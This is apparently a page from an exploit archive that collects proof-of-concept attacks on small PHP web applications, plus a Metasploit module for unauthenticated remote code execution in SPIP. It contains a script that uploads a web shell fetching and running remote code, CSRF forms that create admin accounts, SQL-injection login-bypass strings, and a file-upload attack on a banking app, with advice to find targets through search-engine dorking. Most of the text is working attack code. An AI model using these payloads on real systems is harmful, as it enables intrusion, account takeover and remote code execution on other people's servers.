CMSsite version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : CMSsite 1.0 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://github.com/VictorAlagwu/CMSsite/archive/master.zip                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 31    Line 40  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'create_post' => '',        'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'post_title' => 'inouva',        'post_category_id' => '123',        'post_tags' => '99',        'post_content' => 'N0_name',        'post_status' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/CMSsite-master/img/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CMSsite 1.0 Shell Upload

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

=============================================================================================================================================  
| # Title     : CMS RIMI v1.3 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://github.com/myroot593/RIMICMS                                                                                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Profile User Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
          
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>

          
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>

          
        <label for="confirm_password">Confirm Password:</label>  
        <input type="password" id="confirm_password" name="confirm_password" required>

          
        <label for="nama">Nama:</label>  
        <input type="text" id="nama" name="nama" required>

          
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required>

          
        <input type="hidden" name="id" value="">

          
        <button type="submit">Submit</button>  
    </form>  
</body>  
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content 

[+] save code as poc.html .

<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
  <div class="form-group ">  
      <label>Judul :</label>  
      <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
      <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group ">  
    <label>Isi Berita :</label>  
    <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
    <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group">  
    <label>Kategori Berita :</label>  
    <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select>  <p class="error-form"></p>  
  </div>  
  <div class="form-group">  
    <label>Status:</label>  
    <select class="form-control" name="status_berita" id="status_berita">  
      <option value="Diterbitkan">Diterbitkan</option>  
      <option value="Draft">Draft</option>  
    </select>  
  </div>  
  <div class="form-group">  
      <label>Gambar Berita</label>  
      <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
      <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
  <p class="error-form"></p>  
  </div>  
  <button type="submit" class="btn btn-primary">Submit</button>  
</form>  
  <p class="error-form"></p>    
  <p class="error-form"></p>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

CMS RIMI 1.3 Cross Site Request Forgery / File Upload

Client Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Client ms Project 1.0 Auth By Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/client-management-system-using-php-mysql/                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Client Management System 1.0 SQL Injection

CCMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : CCMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/                                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CCMS Project 1.0 SQL Injection

Biobook Social Networking Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : biobook Social Networking Site 1.0 Auth By Pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/social/home.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Biobook Social Networking Site 1.0 SQL Injection

This Metasploit module exploits a remote code execution vulnerability in SPIP versions up to and including 4.2.12. The vulnerability occurs in SPIP's templating system where it incorrectly handles user-supplied input, allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a payload manipulating the templating data processed by the echappe_retour() function, invoking traitements_previsu_php_modeles_eval(), which contains an eval() call.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin',        'Description' => %q{          This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.          The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,          allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a          payload manipulating the templating data processed by the `echappe_retour()` function, invoking          `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.        },        'Author' => [          'Valentin Lobstein',  # Metasploit module author          'Laluka',             # Vulnerability discovery          'Julien Voisin'       # Review        ],        'License' => MSF_LICENSE,        'References' => [          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']        ],        'Platform' => ['php', 'unix', 'linux', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory', {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell', {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell', {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2024-08-16',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def check    uri = normalize_uri(target_uri.path, 'spip.php')    res = send_request_cgi({ 'uri' => uri.to_s })    return Exploit::CheckCode::Unknown('Target is unreachable.') unless res    return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text    return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/    version = ::Regexp.last_match(1)    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/      version = ::Regexp.last_match(1)    end    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version    print_status("SPIP Version detected: #{version}")    if Rex::Version.new(version) > Rex::Version.new('4.2.12')      return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")    end    return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")  end  def php_exec_cmd(encoded_payload)    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)    shell = <<-END_OF_PHP_CODE        #{php_preamble(disabled_varname: dis)}        $c = base64_decode("#{encoded_clean_payload}");        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE    return shell  end  def exploit    print_status('Preparing to send exploit payload to the target...')    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)    b64_payload = framework.encoders.create('php/base64').encode(phped_payload)    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"    print_status('Sending exploit payload to the target...')    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'spip.php'),      'vars_get' => {        'action' => 'porte_plume_previsu'      },      'data' => "data=#{payload}"    })  endend

SPIP 4.2.12 Remote Code Execution

AVMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AVMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/07/Apartment-Visitors-Management-System-Project.zip                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/AVMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AVMS Project 1.0 SQL Injection

Online Survey System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Survey System 1.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/survey/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Survey System 1.0 Cross Site Request Forgery

Online Shopping System Master version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : online shopping system master v1.0 CSRF Vulnerability                                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adduser.php.

[+] save code as poc.html .

<div class="card">  
                <div class="card-header card-header-primary">  
                  <h4 class="card-title">Add Users</h4>  
                  <p class="card-category">Complete User profile</p>  
                </div>  
                <div class="card-body">  
                  <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
                    <div class="row">

                            </div>  
                      </div>  
                    </div>  
                    <div class="row">  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Email</label>  
                          <input type="email" name="email" id="email" class="form-control" required="">  
                        </div>  
                      </div>  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Password</label>  
                          <input type="password" id="password" name="password" class="form-control" required="">  
                        </div>  
                      </div>

                                        <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
                    <div class="clearfix"></div>  
                  </form>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Shopping System Master 1.0 Cross Site Request Forgery

Online Banking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload PHP malicious files directly.

    [+] Here’s a breakdown of its components and functionality:

    HTML Structure:  
        DOCTYPE & <html>: Defines the document type and language.  
        <head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.  
        <body>: Contains the main content of the page.

    Form Elements:  
        <form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.  
        <label> and <input> fields: Collect information from the user:  
            Target IP: IP address where the file will be uploaded.  
            Attacker IP: The IP address of the attacker (though this field is not used in the script).  
            Attacker Port: The port number of the attacker (not used in the script).  
            File Input: Allows the user to select a file to upload.  
        <button>: A button that triggers the file upload process when clicked.

    JavaScript Functionality:  
        uploadFile(): Function executed when the "Upload File" button is clicked.  
            Collects input values: Retrieves values from the input fields and the selected file.  
            Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.  
            FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').  
            fetch API: Sends a POST request to the target IP with the file attached:  
                URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings  
                Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.

    Security Note:  
        Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused.   
    It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.

[+] Line 45 set url of target.

[+] Choose the target IP .

[+] Put any IP address of your own .

[+] Put any port .

[+] The path to upload the files : http://localhost/banking/uploads/

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Direct File Upload</title>  
</head>  
<body>

    <h2>Direct File Upload</h2>  
    <form id="uploadForm">  
        <label for="targetIP">Target IP:</label>  
        <input type="text" id="targetIP" name="targetIP" required><br><br>

        <label for="attackerIP">Attacker IP:</label>  
        <input type="text" id="attackerIP" name="attackerIP" required><br><br>

        <label for="attackerPort">Attacker Port:</label>  
        <input type="number" id="attackerPort" name="attackerPort" required><br><br>

        <label for="fileInput">Select File:</label>  
        <input type="file" id="fileInput" name="fileInput" required><br><br>

        <button type="button" onclick="uploadFile()">Upload File</button>  
    </form>

    <script>  
        function uploadFile() {  
            const targetIP = document.getElementById('targetIP').value;  
            const attackerIP = document.getElementById('attackerIP').value;  
            const attackerPort = document.getElementById('attackerPort').value;  
            const fileInput = document.getElementById('fileInput').files[0];

            if (!targetIP || !attackerIP || !attackerPort || !fileInput) {  
                alert('Please fill in all fields and select a file.');  
                return;  
            }

            const formData = new FormData();  
            formData.append('name', 'PWNED');  
            formData.append('img', fileInput);

            console.log("(+) Uploading file...");

            fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {  
                method: 'POST',  
                body: formData  
            })  
            .then(response => response.text())  
            .then(data => {  
                if (data === '1') {  
                    console.log("(+) File upload seems to have been successful!");  
                } else {  
                    console.log("(-) Oh no, the file upload seems to have failed!");  
                }  
            })  
            .catch(error => console.error("(-) Error during file upload:", error));  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Tag

#php